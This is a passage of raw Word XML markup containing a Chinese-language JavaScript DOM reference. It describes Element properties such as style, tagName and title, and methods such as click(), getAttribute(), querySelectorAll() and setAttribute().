      </w:r>
      <w:r>
        <w:t>的元素。＜</w:t>
      </w:r>
      <w:r>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素（参见</w:t>
      </w:r>
      <w:r>
        <w:t>Document.documentElement</w:t>
      </w:r>
      <w:r>
        <w:t>）的这两个属性的定义为文档滚过部分的数量。注意，这两个属性没有定义＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签中滚过部分的数量。可以通过设置这两个属性来滚动一个元素或整个文档。参见</w:t>
      </w:r>
      <w:r>
        <w:t>15.8.5</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly CSSStyleDeclaration style</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值定义了当前元素的内联</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式。注意，这个属性的值不是一个字符串，而是一个对象，其属性与</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式的属性一致并且可读写。细节请参考</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleDeclaration</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string tagName</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前元素的标签名。对</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档来说，无论文档源代码中标签名的大小写情况如何，总是返回大写的形式，所以，一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>tagName</w:t>
      </w:r>
      <w:r>
        <w:t>属性值为</w:t>
      </w:r>
      <w:r>
        <w:t>"P"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档是区分大小写的，返回的标签名和文档源代码中它所写的形式完全一致。这个属性与继承自</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>接口的</w:t>
      </w:r>
      <w:r>
        <w:t>nodeName</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值相同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string title</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前元素的</w:t>
      </w:r>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值。在许多浏览器中，当鼠标指针移到元素上时，浏览器会以工具提示的方式显示这个属性的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void blur()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法将键盘焦点转移到当前包含</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>ody</w:t>
      </w:r>
      <w:r>
        <w:t>元素上。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void click()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个方法在当前元素上模拟一次单击。如果在这个元素上的正常单击会引发某个事件（比如转向一个链接），这个方法也会让对应事件发生。在其他情况下，调用这个方法只会在对应元素上触发一个单击事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void focus()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将键盘焦点转移到当前元素上。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string getAttribute(string qualifedName)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>getAttribute()</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个元素的指定名字的属性的值，如果对应名字的属性不存在则返回</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。注意，</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLElement</w:t>
      </w:r>
      <w:r>
        <w:t>对象为每一个标准</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性定义了匹配的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>属性，所以在处理</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档时，只有在查询非标准属性的值的情况下才需要用到这个方法。在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中，属性名是区分大小写的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中，无法直接以元素属性的方式来获取属性值，只能通过调用这个方法来查找。对使用命名空间的</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档来说，在传入这个方法的属性名中要包含命名空间前缀以及冒号或者使用</w:t>
      </w:r>
      <w:r>
        <w:t>getAttributeNS()</w:t>
      </w:r>
      <w:r>
        <w:t>来代替。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string getAttributeNS(string namespace,string localName)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个方法和</w:t>
      </w:r>
      <w:r>
        <w:t>ge</w:t>
      </w:r>
      <w:r>
        <w:t>tAttribute()</w:t>
      </w:r>
      <w:r>
        <w:t>方法非常类似，区别在于属性被分为命名空间</w:t>
      </w:r>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:t>以及命名空间下的本地名字的组合。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ClientRect getBoundingClientRect()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回描述当前元素的边框的</w:t>
      </w:r>
      <w:r>
        <w:t>ClientRect</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ClientRect[]getClientRects()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个类数组对象，由描述了当前元素覆盖的一个或多个矩形的</w:t>
      </w:r>
      <w:r>
        <w:t>ClientRects</w:t>
      </w:r>
      <w:r>
        <w:t>组成。（跨越多行的内联对象往往需要多于一个的矩形才能精确地描述它们在窗口中的区域。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>NodeList getElementsByClassName</w:t>
      </w:r>
      <w:r>
        <w:t>(string classNames)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个由子孙元素组成的类数组对象，每个元素的</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性都包含所有指定的</w:t>
      </w:r>
      <w:r>
        <w:t>classNames</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>classNames</w:t>
      </w:r>
      <w:r>
        <w:t>可以是一个单独的类或者是一个由空格分隔的类列表。返回的</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>是实时的，会随着文档的变化自动更新。元素在返回的</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>中的出现顺序与它们在文档中的出现顺序一样。注意</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>也定义了这个方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>NodeList getElementsByTagName(string qualifedName)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个方法遍历当前元素的所有子孙元素，</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个由具有指定标签名的</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>节点组成的实时的类数组</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>。元素在返回的数组中的出现顺序与它们在源文档中的出现顺序相同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象也有一个类似的</w:t>
      </w:r>
      <w:r>
        <w:t>getElementsByTagName()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，不过它将遍历整个文档，而不仅仅是单个元素的子孙。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>NodeList getElementsByTagNameNS(string namespace,string localName)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法类似于</w:t>
      </w:r>
      <w:r>
        <w:t>getElementsByTagName()</w:t>
      </w:r>
      <w:r>
        <w:t>，不同的是它查找的元素由一个命名空间</w:t>
      </w:r>
      <w:r>
        <w:t>UR</w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t>以及这个命名空间下的本地名字的组合定义。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean hasAttribute(string qualifedName)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果当前元素拥有指定名字的属性，这个方法返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中，属性名是区分大小写的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean hasAttributeNS(string namespace,string localName)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法类似于</w:t>
      </w:r>
      <w:r>
        <w:t>hasAttribute()</w:t>
      </w:r>
      <w:r>
        <w:t>，不同之处是属性由命名空间</w:t>
      </w:r>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:t>以及这个命名空间下的本地名字指定。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">void </w:t>
      </w:r>
      <w:r>
        <w:t>insertAdjacentHTML(string position,string text)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法在相对于当前元素的指定</w:t>
      </w:r>
      <w:r>
        <w:t>position</w:t>
      </w:r>
      <w:r>
        <w:t>处插入指定的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>标签</w:t>
      </w:r>
      <w:r>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t>。参数</w:t>
      </w:r>
      <w:r>
        <w:t>position</w:t>
      </w:r>
      <w:r>
        <w:t>的取值只能是下面</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个字符串之一：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251754496" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="2605177" cy="1052422"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="99" name="00099.jpeg" descr="000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99.jpeg" descr="00099.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId102"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2605177" cy="1052422"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Element querySelector(string selectors)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回当前元素的第一个匹配指定</w:t>
      </w:r>
      <w:r>
        <w:t>CSS selectors</w:t>
      </w:r>
      <w:r>
        <w:t>（可能是一个单独的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>选择器或者一组由逗号分隔的选择器）的子孙元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NodeList querySelectorAll(string </w:t>
      </w:r>
      <w:r>
        <w:t>selectors)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回当前</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>的所有匹配指定</w:t>
      </w:r>
      <w:r>
        <w:t>selectors</w:t>
      </w:r>
      <w:r>
        <w:t>（可能是一个单独的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>选择器或者一组由逗号分隔的选择器）的子孙元素组成的类数组对象。不同于</w:t>
      </w:r>
      <w:r>
        <w:t>getElementsByTagName()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回的</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>，这个方法返回的</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>不是实时的：它只是调用这个方法时匹配的元素的一张静态快照。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void removeAttribute(string qualifedName)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>removeAttribute()</w:t>
      </w:r>
      <w:r>
        <w:t>删除当前元素的指定名字的属性。尝试移除不存在的属性的操作会自动忽</w:t>
      </w:r>
      <w:r>
        <w:t>略。在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中，属性名是区分大小写的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void removeAttributeNS(string namespace,string localName)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>removeAttributeNS()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>removeAttribute()</w:t>
      </w:r>
      <w:r>
        <w:t>很类似，不同之处是移除的属性由命名空间</w:t>
      </w:r>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:t>和本地名字定义。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void scrollIntoView([boolean top])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素当前在窗口中不可见，这个方法将滚动文档以便将它显示出来。参数</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t>可选，用于确定元素应该定位在靠近窗口的顶部还是底部。如果值</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>或省略，浏览器会尝试将元素定位在靠近顶部的地方。如果值为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，浏览器会尝试将元素定位在靠近底部的地方。对那些可接受键盘焦点的元素来说，比如</w:t>
      </w:r>
      <w:r>
        <w:t>Input</w:t>
      </w:r>
      <w:r>
        <w:t>元素，</w:t>
      </w:r>
      <w:r>
        <w:t>focus()</w:t>
      </w:r>
      <w:r>
        <w:t>方法会隐性地执行一样的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>滚动到显示</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>操作。也可参见</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>scrollTo()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void setAttribute(string qualifedName,string value)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法将指定属性设置为指定的值。如果没有对应名字的属性，将新创建一个。在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中，在设置之前属性名会先转为小</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>写。注意，</w:t>
      </w:r>
      <w:r>
        <w:t>HTM</w:t>
      </w:r>
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t>文档的</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLElement</w:t>
      </w:r>
      <w:r>
        <w:t>对象为所有标准</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性定义了相应的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>属性，可以通过这些属性直接设置对应的属性值。也就是说，只有在设置非标准属性时才需要使用这个方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void setAttributeNS(string namespace,string qualifedName,string value)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法类似于</w:t>
      </w:r>
      <w:r>
        <w:t>setAttribute()</w:t>
      </w:r>
      <w:r>
        <w:t>，不同之处是创建或设置的属性由命名空间</w:t>
      </w:r>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:t>、命名空间的前缀组成的限定名、冒号以及命名空间中的本地名字定义。</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代表</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素的</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
